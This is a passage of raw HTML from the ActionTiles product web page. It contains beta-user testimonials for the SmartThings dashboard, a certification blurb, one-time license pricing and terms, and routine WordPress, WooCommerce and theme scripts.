class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>Much more sophisticated than what I use it for, but for my particular application... it's perfect!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Mike</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>It's impossible to overstate the need for something like this. For my household, ActionTiles has become the FACE of SmartThings.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Steven in Colorado</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>ActionTiles made all the difference in my family accepting a smart home setup.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Ginny in Texas</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>I was able to recreate my SmartTiles configuration in ActionTiles quickly and smoothly. Additional features let me improve my layouts. There is a lot that I have not even begun to tap!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Jon</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>The Picasso of dashboards and a masterpiece on our wall! My wife and I like our home to be neat, clean and up to date. ActionTiles gives our home automation a pretty and functional face.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Joel</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>The web interface that SmartThings is missing. Now I can control SmartThings from all my devices with the same dashboards on any browser. Thanks ActionTiles!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Alex in Portland, OR</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>ActionTiles is the glue that has made my home automation a success - from home comfort to security, it has been invaluable. ActionTiles is the most admired ‘gadget’ in my house by guests!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Stephen in London, UK</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>ActionTiles gives me a comprehensive and easy to use interface to my home and holiday home. I can quickly check status and control everything; on my PC, tablet or phone whilst travelling.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Simon in Sevenoaks, UK</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>The new and improved interface lets me easily separate devices by room, allowing for a quick glance to determine everything is operational.</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Brian in Columbus, OH</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div><div class="ult-item-wrap" data-animation="animated no-animation"><div class="cl-review type_quote layout_clean quote_italic"><div class="cl-review-quote"><div class="cl-review-quote-text" style="font-size:18px;"><q>ActionTiles is the interface SmartThings was missing!</q></div><div class="cl-review-author" style="font-size:14px;"><span class="cl-review-author-name">Michael in Orlando, FL</span><span class="cl-review-author-occupation">ActionTiles Beta Participant</span></div></div></div></div></div></div> <script type="text/javascript"> jQuery(document).ready(function ($) { if( typeof jQuery('.ult-carousel-16102398425cdd782e4fa00').slick == "function"){ $('.ult-carousel-16102398425cdd782e4fa00').slick({dots: false,autoplay: true,autoplaySpeed: 12500,speed: 300,infinite: true,arrows: true,nextArrow: '<button type="button" role="button" aria-label="Next" style="color:#dd9933; font-size:20px;background:;" class="slick-next circle-bg"><i class="ultsl-arrow-right4"></i></button>',prevArrow: '<button type="button" role="button" aria-label="Previous" style="color:#dd9933; font-size:20px;background:;" class="slick-prev circle-bg"><i class="ultsl-arrow-left4"></i></button>',slidesToScroll:1,slidesToShow:1,swipe: true,draggable: true,touchMove: true,pauseOnHover: true,pauseOnFocus: false,responsive: [ { breakpoint: 1025, settings: { slidesToShow: 1, slidesToScroll: 1, } }, { breakpoint: 769, settings: { slidesToShow: 1, slidesToScroll: 1 } }, { breakpoint: 481, settings: { slidesToShow: 1, slidesToScroll: 1 } } ],pauseOnDotsHover: true,customPaging: function(slider, i) { return '<i type="button" style= "color:#333333;" class="ultsl-record" data-role="none"></i>'; },}); } }); </script> <div class="vc_empty_space" style="height: 20px" ><span class="vc_empty_space_inner"></span></div> </div></div></div></div></div></section><section class="l-section wpb_row height_small color_alternate"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-3 wpb_column vc_column_container animate_afr"><div class="vc_column-inner vc_custom_1487662940411"><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 10px" ><span class="vc_empty_space_inner"></span></div> <div class="w-iconbox iconpos_left style_default color_contrast"><div class="w-iconbox-icon"><i class="material-icons">search</i></div><div class="w-iconbox-meta"><h3 class="w-iconbox-title" style="font-size:20px"><strong>Reviewed and Certified by SmartThings™</strong></h3><div class="w-iconbox-text"><strong>ActionTiles</strong> is a trustworthy application:</p> <p>Security, privacy, and cloud performance have been reviewed and approved.</p> <p>Our partnership has earned ActionTiles the &#8220;<strong>Works With SmartThings™</strong>&#8221; designation.</p> </div></div></div></div></div></div><div class="vc_col-sm-3 wpb_column vc_column_container animate_afr"><div class="vc_column-inner vc_custom_1487709261884"><div class="wpb_wrapper"><div class="w-image align_right"><div class="w-image-h"><img width="600" height="836" src="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/st-badge-wwst-vertical-color-TM-rgb.png?fit=600%2C836&amp;ssl=1" class="attachment-us_600_0 size-us_600_0 jetpack-lazy-image" alt="" data-lazy-srcset="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/st-badge-wwst-vertical-color-TM-rgb.png?w=600&amp;ssl=1 600w, https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/st-badge-wwst-vertical-color-TM-rgb.png?resize=215%2C300&amp;ssl=1 215w" data-lazy-sizes="(max-width: 600px) 100vw, 600px" data-lazy-src="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/st-badge-wwst-vertical-color-TM-rgb.png?fit=600%2C836&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></div> <div class="wpb_text_column "> <div class="wpb_wrapper"> <p style="text-align: center;"><a href="https://www.SmartThings.com" target="_blank" rel="noopener noreferrer">www.SmartThings.com</a></p> </div> </div> </div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container animate_afl"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image"><div class="w-image-h"><img width="768" height="512" src="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/SurfaceHubFlowers-768x512.jpg?fit=768%2C512&amp;ssl=1" class="attachment-large size-large jetpack-lazy-image" alt="" data-lazy-srcset="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/SurfaceHubFlowers-768x512.jpg?resize=768%2C512&amp;ssl=1 768w, https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/SurfaceHubFlowers-768x512.jpg?resize=600%2C400&amp;ssl=1 600w, https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/SurfaceHubFlowers-768x512.jpg?resize=300%2C200&amp;ssl=1 300w, https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/SurfaceHubFlowers-768x512.jpg?resize=272%2C182&amp;ssl=1 272w" data-lazy-sizes="(max-width: 768px) 100vw, 768px" data-lazy-src="https://i1.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/SurfaceHubFlowers-768x512.jpg?fit=768%2C512&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></div></div></div></div></div></div></div></div></div></div></div></section><section class="l-section wpb_row height_auto color_alternate"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-separator type_default size_small thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h2 style="text-align: center;"><span style="color: #ef6c00;"><strong>Value Price per SmartThings Location (Hub)</strong></span></h2> </div> </div> <div class="vc_empty_space" style="height: 0.1em" ><span class="vc_empty_space_inner"></span></div> </div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container animate_afl"><div class="vc_column-inner"><div class="wpb_wrapper"><div class="w-image align_center vc_custom_1510820778357"><div class="w-image-h"><a href="https://www.actiontiles.com/shop/location-license" title="Affordable License Shop Page" target="_blank" rel=""><img width="525" height="250" src="https://i0.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/20171116_2899_Price.png?fit=525%2C250&amp;ssl=1" class="attachment-us_600_0 size-us_600_0 jetpack-lazy-image" alt="$28.99 after 14 day free trial" data-lazy-srcset="https://i0.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/20171116_2899_Price.png?w=525&amp;ssl=1 525w, https://i0.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/20171116_2899_Price.png?resize=300%2C143&amp;ssl=1 300w" data-lazy-sizes="(max-width: 525px) 100vw, 525px" data-lazy-src="https://i0.wp.com/www.actiontiles.com/wp-content/uploads/2017/02/20171116_2899_Price.png?fit=525%2C250&amp;ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></div></div></div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container animate_afr"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <h4>One-Time Fee includes:</h4> <ul class="at_feat_list" style="font-size: 120%;"> <li>Non-transferable<sup>**</sup> license to connect to one <a href="https://www.SmartThings.com" target="_blank" rel="noopener noreferrer">SmartThings</a> Location (Hub).</li> <li>Unlimited Things, Tiles &amp; Panels.</li> <li>Unlimited ActionTiles Accounts &amp; Panel Sharing.</li> <li>Customer Support by email &amp; forum.</li> </ul> </div> </div> <div class="g-cols wpb_row type_default valign_top vc_inner "><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class=" vc_custom_1510820929724 ubtn-ctn-left "><a class="ubtn-link ult-adjust-bottom-margin ubtn-left ubtn-normal " href="https://www.actiontiles.com/get_started_button" title="Start Now!" target="_blank" rel="noopener" ><button type="button" id="ubtn-2578" class="ubtn ult-adjust-bottom-margin ult-responsive ubtn-normal ubtn-fade-bg ulta-grow ubtn-left tooltip-5cdd782e55989 ubtn-tooltip right" data-toggle="tooltip" data-placement="right" title="Start Trial now..." data-hover="" data-border-color="" data-bg="#81d742" data-hover-bg="" data-border-hover="" data-shadow-hover="" data-shadow-click="none" data-shadow="" data-shd-shadow="" data-ultimate-target='#ubtn-2578' data-responsive-json-new='{"font-size":"","line-height":""}' style="font-weight:normal;border:none;background: #81d742;color: #000000;"><span class="ubtn-data ubtn-icon"><i class="none" style="font-size:32px;color:;"></i></span><span class="ubtn-hover" style="background-color:"></span><span class="ubtn-data ubtn-text " >Try it Now!</span></button></a></div><script> jQuery(function () { jQuery(".tooltip-5cdd782e55989").bsf_tooltip(); }) </script></div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"><div class=" vc_custom_1510820940033 ubtn-ctn-left "><a class="ubtn-link ult-adjust-bottom-margin ubtn-left ubtn-normal " href="https://www.actiontiles.com/shop/location-license" title="Start Now!" ><button type="button" id="ubtn-7759" class="ubtn ult-adjust-bottom-margin ult-responsive ubtn-normal ubtn-fade-bg ulta-grow ubtn-left tooltip-5cdd782e55bf1 ubtn-tooltip right" data-toggle="tooltip" data-placement="right" title="Jump to our Shop..." data-hover="" data-border-color="" data-bg="#81d742" data-hover-bg="" data-border-hover="" data-shadow-hover="" data-shadow-click="none" data-shadow="" data-shd-shadow="" data-ultimate-target='#ubtn-7759' data-responsive-json-new='{"font-size":"","line-height":""}' style="font-weight:normal;border:none;background: #81d742;color: #000000;"><span class="ubtn-data ubtn-icon"><i class="none" style="font-size:32px;color:;"></i></span><span class="ubtn-hover" style="background-color:"></span><span class="ubtn-data ubtn-text " >Buy License</span></button></a></div><script> jQuery(function () { jQuery(".tooltip-5cdd782e55bf1").bsf_tooltip(); }) </script></div></div></div></div></div></div></div><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column vc_custom_1546590248165"> <div class="wpb_wrapper"> <p style="line-height: 110%;">* Non-refundable license purchase price in US Dollars, optionally payable in $37.99 Canadian. Prices subject to change without notice. Some future premium features may carry additional fees. Licenses, availability, and usage are subject to ActionTiles&#8217;s <a href="https://www.actiontiles.com/terms/" target="_blank" rel="noopener noreferrer"><strong>Terms of Service</strong></a>.</p> <p style="line-height: 110%;">** Licenses may be transferred to replacement Locations/Hubs within the same household. See this <a href="http://support.actiontiles.com/topics/1461-can-i-transfer-my-location-license-key-to-a-replacement-hub-it-has-a-new-smartthings-location-id/" target="_blank" rel="noopener noreferrer"><strong>link</strong></a> for more details.</p> </div> </div> <div class="w-separator type_default size_small thick_1 style_solid color_border cont_none"><span class="w-separator-h"></span></div></div></div></div></div></div></section><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ffffff" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.4.7" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div><!-- Row Backgrounds --><div class="upb_color" data-bg-override="0" data-bg-color="#ffffff" data-fadeout="" data-fadeout-percentage="30" data-parallax-content="" data-parallax-content-sense="30" data-row-effect-mobile-disable="true" data-img-parallax-mobile-disable="true" data-rtl="false" data-custom-vc-row="" data-vc="5.4.7" data-is_old_vc="" data-theme-support="" data-overlay="false" data-overlay-color="" data-overlay-pattern="" data-overlay-pattern-opacity="" data-overlay-pattern-size="" ></div> </main> </div> </div> </div> <footer class="l-footer" itemscope itemtype="https://schema.org/WPFooter"> <section class="l-section wpb_row height_auto color_custom" style="background-color: #33691e; color: #ffffff;padding-top: 10px !important;padding-right: 24px !important;padding-left: 24px !important;"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-12 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <p style="text-align: left"><a href="https://www.actiontiles.com/terms/"><strong>Terms of Service</strong></a> • <a href="https://www.actiontiles.com/privacy/"><strong>Privacy Policy</strong></a> • <a href="https://www.actiontiles.com/cookies/"><strong>Cookies</strong></a></p> </div> </div> </div></div></div></div></div></section><section class="l-section wpb_row height_auto color_custom" style="background-color: #33691e; color: #ffffff;padding-top: 10px !important;padding-right: 24px !important;padding-left: 24px !important;"><div class="l-section-h i-cf"><div class="g-cols vc_row type_default valign_top"><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner"><div class="wpb_wrapper"> <div class="wpb_text_column "> <div class="wpb_wrapper"> <p style="text-align: left;font-size: small;line-height: 1.1;margin-bottom: 1em">© 2017 Thingterfaces™ LP. All Rights Reserved.</p> <p style="text-align: left;font-size: small;line-height: 1.1;margin-bottom: 1em">ActionTiles, SmartTiles, Thingterfaces, marked slogans, the &#8220;house/tiled wall&#8221; logo and icon designs are trademarks of Thingterfaces&nbsp;LP. All other trademarks used for reference only. ActionTiles is <strong>not</strong> a product of <a href="https://www.SmartThings.com" target="_blank" rel="noopener">Samsung SmartThings</a>.</p> </div> </div> </div></div></div><div class="vc_col-sm-6 wpb_column vc_column_container"><div class="vc_column-inner vc_custom_1487675890956"><div class="wpb_wrapper"><div class="w-socials align_right style_default color_desaturated_inv" style="font-size:18px;"><div class="w-socials-list"><div class="w-socials-item email"><a class="w-socials-item-link" href="mailto:[email protected]" aria-label="Email" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>Email</span></div></div><div class="w-socials-item facebook"><a class="w-socials-item-link" target="_blank" href="https://www.facebook.com/ActionTiles" aria-label="Facebook" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>Facebook</span></div></div><div class="w-socials-item twitter"><a class="w-socials-item-link" target="_blank" href="https://www.Twitter.com/ActionTiles" aria-label="Twitter" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>Twitter</span></div></div><div class="w-socials-item google"><a class="w-socials-item-link" target="_blank" href="https://plus.Google.com/+ActionTiles" aria-label="Google+" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>Google+</span></div></div><div class="w-socials-item linkedin"><a class="w-socials-item-link" target="_blank" href="https://www.linkedin.com/company/thingterfaces-lp" aria-label="LinkedIn" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>LinkedIn</span></div></div><div class="w-socials-item youtube"><a class="w-socials-item-link" target="_blank" href="https://www.YouTube.com/ActionTiles" aria-label="YouTube" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>YouTube</span></div></div><div class="w-socials-item instagram"><a class="w-socials-item-link" target="_blank" href="https://www.Instagram.com/ActionTiles" aria-label="Instagram" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>Instagram</span></div></div><div class="w-socials-item pinterest"><a class="w-socials-item-link" target="_blank" href="https://www.Pinterest.com/ActionTiles" aria-label="Pinterest" rel="nofollow"><span class="w-socials-item-link-hover"></span></a><div class="w-socials-item-popup"><span>Pinterest</span></div></div></div></div></div></div></div></div></div></section> </footer> <a class="w-toplink pos_right" href="#" title="Back to top" aria-hidden="true"></a> <a class="w-header-show" href="javascript:void(0);"><span>Menu</span></a> <div class="w-header-overlay"></div> <script type="text/javascript"> // Store some global theme options used in JS if (window.$us === undefined) window.$us = {}; $us.canvasOptions = ($us.canvasOptions || {}); $us.canvasOptions.disableEffectsWidth = 900; $us.canvasOptions.responsive = true; $us.canvasOptions.backToTopDisplay = 100; $us.langOptions = ($us.langOptions || {}); $us.langOptions.magnificPopup = ($us.langOptions.magnificPopup || {}); $us.langOptions.magnificPopup.tPrev = 'Previous (Left arrow key)'; $us.langOptions.magnificPopup.tNext = 'Next (Right arrow key)'; $us.langOptions.magnificPopup.tCounter = '%curr% of %total%'; $us.navOptions = ($us.navOptions || {}); $us.navOptions.mobileWidth = 900; $us.navOptions.togglable = true; $us.ajaxLoadJs = true; $us.templateDirectoryUri = 'https://www.actiontiles.com/wp-content/themes/Zephyr'; </script> <div style="width:100%;text-align:center; font-size:11px; clear:both"><a target="_blank" title="Insert HTML Snippet Wordpress Plugin" href="http://xyzscripts.com/wordpress-plugins/insert-html-snippet/">HTML Snippets</a> Powered By : <a target="_blank" title="PHP Scripts & Wordpress Plugins" href="http://www.xyzscripts.com" >XYZScripts.com</a></div> <div style="display:none"> </div> <script type="text/javascript">$us.headerSettings = {"default":{"options":{"orientation":"hor","sticky":1,"scroll_breakpoint":"50","transparent":0,"width":300,"elm_align":"center","top_show":"0","top_height":"30","top_sticky_height":"20","top_fullwidth":"1","middle_height":"70","middle_sticky_height":"50","middle_fullwidth":"1","bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_attachment":1,"bg_img_position":"top center","bgimage_wrapper_end":"","bottom_show":0,"bottom_height":50,"bottom_sticky_height":50,"bottom_fullwidth":0},"layout":{"top_left":[],"top_center":[],"top_right":[],"middle_left":["image:2"],"middle_center":[],"middle_right":["menu:1","btn:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":["text:1","html:1","image:1","text:2","socials:1","html:2"]}},"tablets":{"options":{"orientation":"hor","sticky":1,"scroll_breakpoint":"50","transparent":0,"width":300,"elm_align":"center","top_show":"0","top_height":"30","top_sticky_height":"24","top_fullwidth":0,"middle_height":"70","middle_sticky_height":"50","middle_fullwidth":0,"bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_attachment":1,"bg_img_position":"top center","bgimage_wrapper_end":"","bottom_show":0,"bottom_height":50,"bottom_sticky_height":50,"bottom_fullwidth":0,"breakpoint":900},"layout":{"top_left":[],"top_center":[],"top_right":[],"middle_left":["menu:1","image:2"],"middle_center":[],"middle_right":["btn:1","html:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":["text:1","image:1","text:2","socials:1","html:2"]}},"mobiles":{"options":{"orientation":"hor","sticky":1,"scroll_breakpoint":50,"transparent":0,"width":300,"elm_align":"center","top_show":"0","top_height":"30","top_sticky_height":"1","top_fullwidth":0,"middle_height":50,"middle_sticky_height":50,"middle_fullwidth":0,"bg_img":"","bg_img_wrapper_start":"","bg_img_size":"cover","bg_img_repeat":"repeat","bg_img_attachment":1,"bg_img_position":"top center","bgimage_wrapper_end":"","bottom_show":0,"bottom_height":50,"bottom_sticky_height":50,"bottom_fullwidth":0,"breakpoint":600},"layout":{"top_left":[],"top_center":[],"top_right":[],"middle_left":["menu:1","image:2"],"middle_center":[],"middle_right":["btn:1","html:1"],"bottom_left":[],"bottom_center":[],"bottom_right":[],"hidden":["text:1","image:1","text:2","socials:1","html:2"]}}};</script> <noscript><img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id=751825985159581&ev=PageView&noscript=1" alt="facebook_pixel"></noscript> <noscript><img height="1" width="1" style="display: none;" src="https://www.facebook.com/tr?id=751825985159581&ev=GeneralEvent&noscript=1&cd[post_type]=page&cd[post_id]=5377&cd[content_name]=ActionTiles+for+SmartThings" alt="facebook_pixel"></noscript> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type="text/javascript"> function revslider_showDoubleJqueryError(sliderID) { var errorMessage = "Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include."; errorMessage += "<br> This includes make eliminates the revolution slider libraries, and make it not work."; errorMessage += "<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true."; errorMessage += "<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it."; errorMessage = "<span style='font-size:16px;color:#BC0C06;'>" + errorMessage + "</span>"; jQuery(sliderID).show().html(errorMessage); } </script> <link rel='stylesheet' id='font-awesome-css' href='//netdna.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var tocplus = {"smooth_scroll":"1","smooth_scroll_offset":"120"}; /* ]]> */ </script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/f0f3c.js?x17256"></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/www.actiontiles.com\/shop\/cart","is_cart":"","cart_redirect_after_add":"yes"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.4.0/assets/js/frontend/add-to-cart.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.4.0/assets/js/jquery-blockui/jquery.blockUI.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.4.0/assets/js/frontend/woocommerce.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_df26f40e631911064ca624cfe46ad0f6","fragment_name":"wc_fragments_df26f40e631911064ca624cfe46ad0f6"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.4.0/assets/js/frontend/cart-fragments.min.js'></script> <script type='text/javascript'> jQuery( 'body' ).bind( 'wc_fragments_refreshed', function() { jQuery( 'body' ).trigger( 'jetpack-lazy-images-load' ); } ); </script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/modules/wpgroho.js'></script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/0d9ff.js?x17256"></script> <script type='text/javascript'> /* <![CDATA[ */ var jpfbembed = {"appid":"249643311490","locale":"en_US"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/facebook-embed.min.js'></script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/12fd5.js?x17256"></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.2.1/_inc/build/lazy-images/js/lazy-images.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var SlimStatParams = {"ajaxurl":"https:\/\/www.actiontiles.com\/wp-admin\/admin-ajax.php","extensions_to_track":"pdf,doc,xls,zip","outbound_classes_rel_href_to_not_track":"noslimstat,ab-item","ci":"YTozOntzOjEyOiJjb250ZW50X3R5cGUiO3M6NDoicGFnZSI7czoxMDoiY29udGVudF9pZCI7aTo1Mzc3O3M6NjoiYXV0aG9yIjtzOjg6InRnYXVjaGF0Ijt9.c28b769d2d06fb5e4e9c5da1da51d0d8"}; /* ]]> */ </script> <script type='text/javascript' src='https://cdn.jsdelivr.net/wp/wp-slimstat/tags/4.7.8.3/wp-slimstat.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.0.4/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://use.fontawesome.com/releases/v5.1.0/js/v4-shims.js?ver=f04dc3177fb921b81ffc7558dd18000d'></script> <script type='text/javascript' src='https://use.fontawesome.com/releases/v5.1.0/js/all.js?ver=f04dc3177fb921b81ffc7558dd18000d'></script> <script type="text/javascript" src="https://www.actiontiles.com/wp-content/cache/minify/dfd30.js?x17256"></script> <script type="text/javascript"> /* Zephyr elements customizations */ // w-search !function($){ "use strict"; $.fn.wSearch = function(){ return this.each(function(){ var $container = $(this), $form = $container.find('.w-search-form'), $btnOpen = $container.find('.w-search-open'), $btnClose = $container.find('.w-search-close'), $input = $form.find('[name="s"]'), $overlay = $container.find('.w-search-background'), $window = $(window), searchOverlayInitRadius = 25, showHideTimer = null, isFullScreen = $container.hasClass('layout_fullscreen'), searchHide = function(){ $container.removeClass('active'); $input.blur(); if (isFullScreen) { $form.css({ '-webkit-transition': 'opacity 0.4s', transition: 'opacity 0.4s' }); window.setTimeout(function(){ $overlay .removeClass('overlay-on') .addClass('overlay-out') .css({ '-webkit-transform': 'scale(0.1)', 'transform': 'scale(0.1)' }); $form.css('opacity', 0); clearTimeout(showHideTimer); showHideTimer = window.setTimeout(function(){ $form.css('display', 'none'); $overlay.css('display', 'none'); }, 700); }, 25); } }; // Handling virtual keyboards at touch devices if (isFullScreen && jQuery.isMobile) { $input .on('focus', function(){ // Transforming hex to rgba var originalColor = $overlay.css('background-color'), overlayOpacity = $overlay.css('opacity'), matches; // RGB Format if (matches = /^rgb\((\d+), (\d+), (\d+)\)$/.exec(originalColor)) { $form.css('background-color', "rgba(" + parseInt(matches[1]) + "," + parseInt(matches[2]) + "," + parseInt(matches[3]) + ", " + overlayOpacity + ")"); } // Hex format else if (matches = 